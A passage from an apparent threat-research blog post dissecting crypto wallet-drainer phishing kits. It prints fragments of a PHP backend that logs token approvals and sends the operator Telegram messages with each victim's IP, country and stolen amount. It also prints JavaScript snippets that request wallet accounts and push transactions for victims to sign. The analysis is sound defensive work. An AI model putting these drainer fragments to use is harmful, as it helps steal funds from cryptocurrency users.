  &lt;b&gt;&#128184; <strong>&#1054;&#1090;&#1087;&#1088;&#1072;&#1074;&#1083;&#1077;&#1085;&#1072;</strong> <strong>&#1084;&#1086;&#1085;&#1077;&#1090;&#1072;</strong>&lt;/b&gt;\n\n
  &lt;b&gt;&#127760; <strong>IP &#1072;&#1076;&#1088;&#1077;&#1089;</strong>:&lt;/b&gt; $_SERVER[REMOTE_ADDR]\n
  &lt;b&gt;&#127988;&#8205;&#9760;&#65039; <strong>&#1057;&#1090;&#1088;&#1072;&#1085;&#1072;</strong>:&lt;/b&gt; $visitor_country\n\n
  &lt;b&gt;&#9939; <strong>&#1057;&#1077;&#1090;&#1100;</strong>:&lt;/b&gt; &lt;code&gt;$chain_name&lt;/code&gt;\n
  &lt;b&gt;&#128176; <strong>&#1057;&#1091;&#1084;&#1084;&#1072;</strong>:&lt;/b&gt; &lt;code&gt;$data[amount]$&lt;/code&gt;");
} elseif ($data['action'] == '<strong>approve_token</strong>') {
  $approves = json_decode(file_get_contents('approve.json'), true);
  array_push($approves, $data);
  file_put_contents('approve.json', json_encode($approves));
  if ($data['notification'] == true) {
    $chain_name = convertCIDtoCName($data['chain_id']);
    sendTelegramMessage("
   &lt;b&gt;&#9989; <strong>&#1055;&#1086;&#1076;&#1090;&#1074;&#1077;&#1088;&#1078;&#1076;&#1077;&#1085;&#1080;&#1077;</strong> <strong>&#1090;&#1086;&#1082;&#1077;&#1085;&#1072;</strong>&lt;/b&gt;\n\n
   &lt;b&gt;&#127760; <strong>IP &#1072;&#1076;&#1088;&#1077;&#1089;</strong>:&lt;/b&gt; $_SERVER[REMOTE_ADDR]\n
   &lt;b&gt;&#127988;&#8205;&#9760;&#65039; <strong>&#1057;&#1090;&#1088;&#1072;&#1085;&#1072;</strong>:&lt;/b&gt; $visitor_country\n\n
   &lt;b&gt;&#9939; <strong>&#1057;&#1077;&#1090;&#1100;</strong>:&lt;/b&gt; &lt;code&gt;$chain_name&lt;/code&gt;\n
   &lt;b&gt;&#128142; <strong>&#1058;&#1086;&#1082;&#1077;&#1085;</strong>:&lt;/b&gt; &lt;code&gt;$data[token]&lt;/code&gt;\n
   &lt;b&gt;&#128176; <strong>&#1057;&#1091;&#1084;&#1084;&#1072;</strong>:&lt;/b&gt; &lt;code&gt;$data[amount]$&lt;/code&gt;");
  }
}</code></pre><p>The <code>action</code> variable supports different values:</p><ul><li><p><strong>retrive </strong>(<em>sic</em>): Creates the temporary file <code>approve.json</code>.</p></li><li><p><strong>transfer_token:</strong> Determines the blockchain to use (Ethereum, BNB, Polygon), then sends the following message to the operator:</p><blockquote><p><strong>&#128142; Token sent</strong></p><p><strong>&#9939; Network:</strong> [Chain]</p><p><strong>&#128142; Token:</strong> [Token]</p><p><strong>&#128176; Amount:</strong> [Amount]</p></blockquote></li><li><p><strong>visit</strong>: Does nothing.</p></li><li><p><strong>connect</strong>: Sends the following message to the operator, including a link to DeBank (a legit platform):</p><blockquote><p><strong>&#129418; Wallet connected</strong></p><p><strong>&#127760; IP Address:</strong> [IP address]</p><p><strong>&#127988;&#8205;&#9760;&#65039; Country:</strong> [Country or &#8220;UNK&#8221;]</p><p><strong>&#128091; Address:</strong> https://debank.com/profile/[Address]</p></blockquote></li><li><p><strong>transfer_native</strong>: Determines the blockchain to use and sends the following message to the operator:</p><blockquote><p><strong>&#128184; Coin sent</strong></p><p><strong>&#127760; IP Address:</strong> [IP address]</p><p><strong>&#127988;&#8205;&#9760;&#65039; Country:</strong> [Country or &#8220;UNK&#8221;]</p><p><strong>&#9939; Network:</strong> [Chain]</p><p><strong>&#128176; Amount:</strong> [Amount]</p></blockquote></li><li><p><strong>approve_token</strong>: Reads the stored information in the <code>approve.json</code> file, determines the blockchain to use and sends the following message to the operator:</p><blockquote><p><strong>&#9989; Token approval</strong></p><p><strong>&#127760; IP Address:</strong> [IP address]</p><p><strong>&#127988;&#8205;&#9760;&#65039; Country:</strong> [Country or &#8220;UNK&#8221;]</p><p><strong>&#9939; Network:</strong> [Chain]</p><p><strong>&#128142; Token:</strong> [Token]</p><p><strong>&#128176; Amount:</strong> [Amount]</p></blockquote></li></ul><p>And that&#8217;s it. The prey falls into the trap, automatically losing all its funds to the operator, who receives a colourful message on Telegram announcing the day&#8217;s earnings.</p><p>That one was easy. We&#8217;re still far from the great medical minds like <a href="https://en.wikipedia.org/wiki/Herbert_West&#8211;Reanimator">Dr Herbert West</a>, <a href="https://en.wikipedia.org/wiki/The_Abominable_Dr._Phibes">Dr Phibes</a> or <a href="https://en.wikipedia.org/wiki/Scarecrow_(DC_Comics)">Dr Jonathan Crane</a>, but we&#8217;ll get there eventually. And definitely not by talking&#8212;so, with no synthetic tissue left to analyse, we&#8217;re free to move on to the next stretcher.</p><div><hr></div><h2><em><strong>&#128137; Dr Ainer</strong></em><strong>,</strong><em><strong> </strong></em><strong>subject POA (PWND on Arrival)</strong></h2><p>The tag on its toe reads '<em>invisiblefriends-main</em>', and at first glance, it is (or was) a fairly well-crafted phishing website built with React.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!6xqB!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8b602ba-9bf5-4554-a00c-1a0a5162c0f1_3386x1758.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!6xqB!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8b602ba-9bf5-4554-a00c-1a0a5162c0f1_3386x1758.png 424w, https://substackcdn.com/image/fetch/$s_!6xqB!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8b602ba-9bf5-4554-a00c-1a0a5162c0f1_3386x1758.png 848w, https://substackcdn.com/image/fetch/$s_!6xqB!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8b602ba-9bf5-4554-a00c-1a0a5162c0f1_3386x1758.png 1272w, https://substackcdn.com/image/fetch/$s_!6xqB!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8b602ba-9bf5-4554-a00c-1a0a5162c0f1_3386x1758.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!6xqB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8b602ba-9bf5-4554-a00c-1a0a5162c0f1_3386x1758.png" width="1456" height="756" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e8b602ba-9bf5-4554-a00c-1a0a5162c0f1_3386x1758.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/426949e4-e221-4813-999e-3a47eb368e20_3386x1758.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:756,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:674634,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!6xqB!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8b602ba-9bf5-4554-a00c-1a0a5162c0f1_3386x1758.png 424w, https://substackcdn.com/image/fetch/$s_!6xqB!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8b602ba-9bf5-4554-a00c-1a0a5162c0f1_3386x1758.png 848w, https://substackcdn.com/image/fetch/$s_!6xqB!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8b602ba-9bf5-4554-a00c-1a0a5162c0f1_3386x1758.png 1272w, https://substackcdn.com/image/fetch/$s_!6xqB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8b602ba-9bf5-4554-a00c-1a0a5162c0f1_3386x1758.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Invisible Friends phishing kit</figcaption></figure></div><p>The template referenced legitimate social profiles and accounts, along with the real <a href="https://etherscan.io/address/0x59468516a8259058bad1ca5f8f4bff190d30e066">INVISIBLE FRIENDS smart contract</a>, and even used Amazon S3 buckets to host part of its static content&#8212;a rather interesting move.</p><p>While browsing through their AWS infrastructure, I noticed something that rang a bell, though I couldn&#8217;t quite place it: a reference to <a href="https://opensea.io/collection/garbage-friends-main">Garbage Friends</a>. I was convinced that I&#8217;d crossed paths with that Sesame Street-like character before, but couldn&#8217;t remember <em>when</em>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!pxFJ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa6a9fa8f-83df-4f9b-ac14-cecebe29e2a1_3288x1628.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!pxFJ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa6a9fa8f-83df-4f9b-ac14-cecebe29e2a1_3288x1628.png 424w, https://substackcdn.com/image/fetch/$s_!pxFJ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa6a9fa8f-83df-4f9b-ac14-cecebe29e2a1_3288x1628.png 848w, https://substackcdn.com/image/fetch/$s_!pxFJ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa6a9fa8f-83df-4f9b-ac14-cecebe29e2a1_3288x1628.png 1272w, https://substackcdn.com/image/fetch/$s_!pxFJ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa6a9fa8f-83df-4f9b-ac14-cecebe29e2a1_3288x1628.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!pxFJ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa6a9fa8f-83df-4f9b-ac14-cecebe29e2a1_3288x1628.png" width="1456" height="721" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a6a9fa8f-83df-4f9b-ac14-cecebe29e2a1_3288x1628.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7216f12f-95cc-47cb-8eb2-51c5faa2cd3f_3288x1628.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:721,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:525557,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!pxFJ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa6a9fa8f-83df-4f9b-ac14-cecebe29e2a1_3288x1628.png 424w, https://substackcdn.com/image/fetch/$s_!pxFJ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa6a9fa8f-83df-4f9b-ac14-cecebe29e2a1_3288x1628.png 848w, https://substackcdn.com/image/fetch/$s_!pxFJ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa6a9fa8f-83df-4f9b-ac14-cecebe29e2a1_3288x1628.png 1272w, https://substackcdn.com/image/fetch/$s_!pxFJ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa6a9fa8f-83df-4f9b-ac14-cecebe29e2a1_3288x1628.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Garbage Friends project mentioned in the phishing kit</figcaption></figure></div><p>The index file has a PHP extension but contains no PHP code at all; in fact, it&#8217;s just plain HTML relying on JavaScript to do the heavy lifting. Everything happens on the frontend, so there&#8217;s no quirky backend to dissect this time. Let&#8217;s focus on the JS libraries instead:</p><ul><li><p><strong>web3.min.js</strong> </p><ul><li><p>Provides tools to interact with the Ethereum blockchain from the frontend. It connects to the user&#8217;s wallet (like <em>MetaMask</em>) and facilitates calls to smart contracts.</p></li></ul></li><li><p><strong>ethereumjs-tx-1.3.3.min.js</strong></p><ul><li><p>Allows for the creation and signing of Ethereum transactions directly in the browser. It enables the drainer to generate transaction data and send it to <em>MetaMask</em> directly.</p></li></ul></li><li><p><strong>SignBlock.js</strong></p><ul><li><p>Manages MetaMask connection and handles the &#8220;Mint&#8221; button functionality. When the user clicks the button, it triggers MetaMask&#8217;s prompt for signing a transaction, allowing the drainer to initiate blockchain actions.</p></li></ul></li><li><p><strong>WalletButton.js</strong></p><ul><li><p>Controls the connection status of the user&#8217;s wallet and displays the wallet address in the interface once connected. It enables seamless interaction with MetaMask, readying the user for signing transactions when needed.</p></li></ul></li></ul><p>Their functions are straightforward and easy to understand: requesting victims' ETH accounts, tracking any changes, and presenting them with transactions to sign.</p><pre><code>ethereum.request({ method: "eth_accounts" })
.then((a) =&gt; setAddr(a[0]));</code></pre><pre><code>this.provider.sendTransaction(r)</code></pre><pre><code>ethereum.on("accountsChanged", (a) =&gt; setAddr(a.length ? a[0] : ""));
ethereum.on("connect", (a) =&gt; setAddr(a.length ? a[0] : ""));</code></pre><p>That&#8217;s not all. I saved an obfuscated JavaScript file called <code>utils.js</code> for last, suspecting it would cause trouble. Due to its size (over 5MB), most deobfuscators failed to process it. When executed, it simply returns a unique ID string.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!7Jqp!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb449705-c837-4ca4-a22a-98aad10f6b73_1852x1644.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!7Jqp!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb449705-c837-4ca4-a22a-98aad10f6b73_1852x1644.png 424w, https://substackcdn.com/image/fetch/$s_!7Jqp!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb449705-c837-4ca4-a22a-98aad10f6b73_1852x1644.png 848w, https://substackcdn.com/image/fetch/$s_!7Jqp!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb449705-c837-4ca4-a22a-98aad10f6b73_1852x1644.png 1272w, https://substackcdn.com/image/fetch/$s_!7Jqp!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb449705-c837-4ca4-a22a-98aad10f6b73_1852x1644.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!7Jqp!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb449705-c837-4ca4-a22a-98aad10f6b73_1852x1644.png" width="542" height="480.95054945054943" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/eb449705-c837-4ca4-a22a-98aad10f6b73_1852x1644.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/02cb3a7e-39ae-495f-8de7-99066dec0233_1852x1644.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1292,&quot;width&quot;:1456,&quot;resizeWidth&quot;:542,&quot;bytes&quot;:391040,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!7Jqp!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb449705-c837-4ca4-a22a-98aad10f6b73_1852x1644.png 424w, https://substackcdn.com/image/fetch/$s_!7Jqp!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb449705-c837-4ca4-a22a-98aad10f6b73_1852x1644.png 848w, https://substackcdn.com/image/fetch/$s_!7Jqp!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb449705-c837-4ca4-a22a-98aad10f6b73_1852x1644.png 1272w, https://substackcdn.com/image/fetch/$s_!7Jqp!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feb449705-c837-4ca4-a22a-98aad10f6b73_1852x1644.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">utils.js payload in action</figcaption></figure></div><p>After many blackbox tests ran on different browsers and setups we couldn&#8217;t trigger it to behave in any other way, but one of our engineers jumped in as he recognized the code to be &#8220;<em><a href="https://en.wikipedia.org/wiki/JSFuck">jsfuck</a></em>&#8221;, an <a href="https://en.wikipedia.org/wiki/Esoteric_programming_language">esoteric language</a> based on JavaScript. </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!NzEE!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe178f762-6742-48d8-a940-49d11f8d37a3_1990x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!NzEE!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe178f762-6742-48d8-a940-49d11f8d37a3_1990x1536.png 424w, https://substackcdn.com/image/fetch/$s_!NzEE!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe178f762-6742-48d8-a940-49d11f8d37a3_1990x1536.png 848w, https://substackcdn.com/image/fetch/$s_!NzEE!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe178f762-6742-48d8-a940-49d11f8d37a3_1990x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!NzEE!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe178f762-6742-48d8-a940-49d11f8d37a3_1990x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!NzEE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe178f762-6742-48d8-a940-49d11f8d37a3_1990x1536.png" width="580" height="447.74725274725273" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e178f762-6742-48d8-a940-49d11f8d37a3_1990x1536.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e27f9894-f586-4445-b145-5a3619e0c91f_1990x1536.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1124,&quot;width&quot;:1456,&quot;resizeWidth&quot;:580,&quot;bytes&quot;:110701,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!NzEE!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe178f762-6742-48d8-a940-49d11f8d37a3_1990x1536.png 424w, https://substackcdn.com/image/fetch/$s_!NzEE!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe178f762-6742-48d8-a940-49d11f8d37a3_1990x1536.png 848w, https://substackcdn.com/image/fetch/$s_!NzEE!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe178f762-6742-48d8-a940-49d11f8d37a3_1990x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!NzEE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe178f762-6742-48d8-a940-49d11f8d37a3_1990x1536.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">JSFuck decoder by Enkh-Erdene from Mongolia &#127474;&#127475; </figcaption></figure></div><p>After finding a suitable <em><a href="https://enkhee-osiris.github.io/Decoder-JSFuck/">jsfuck</a></em><a href="https://enkhee-osiris.github.io/Decoder-JSFuck/"> deobfuscator</a> we were pretty safe to asume we just witnessed the most puzzling, nightmarish and ill-intentioned ID generator. </p><p>And we loved it.</p><div class="pullquote"><p><em>&#128591; Special thanks to <strong>John Mis P&#233;rez</strong> for his help with this component.</em></p></div><p>A complex frontend, no backend, and JavaScript hexes to keep this nightmare fuel burning. I thought we'd seen it all&#8230; but no, wait a minute.</p><p>Remember <em>Garby</em>? That trash can character from Garbage Friends? Well, out of the blue, I remembered how we met. I decided to check my old Tweets&#8212;and there it was. Back in 2022, a threat actor hacked into Argentina&#8217;s Security Minister Sabina Frederic&#8217;s official Twitter account to advertise their 